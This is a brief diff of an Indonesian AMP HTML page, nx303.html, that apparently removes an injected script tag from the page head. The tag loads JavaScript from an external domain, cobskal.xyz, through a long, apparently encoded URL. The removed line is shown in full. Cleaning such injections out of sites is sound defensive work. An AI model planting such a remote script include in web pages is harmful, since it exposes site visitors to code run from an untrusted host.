--- a/nx303.html
+++ b/nx303.html
@@ -1,7 +1,7 @@
 
 <!doctype html>
 <html amp lang="id">
-<head><script type='text/javascript' src='https://cobskal.xyz/rsXJ9THXV9HXCCYGzicy4_zOY-z5263ecHkRxRk9aMY37hIR9Zo7tYyargFNSioGMsQJaNusGabL0LgfJ7W98r8U_aAI0M-GK9mfQD93cAj6EvhD9x-IUaQajGrpDRAa4ABqM-Cb46AX7sK0RhGdJ1Zk8hrclbqR_T8xNtFyR1Y='></script>
+<head>
     <meta charset="utf-8">
     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
     <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1" />
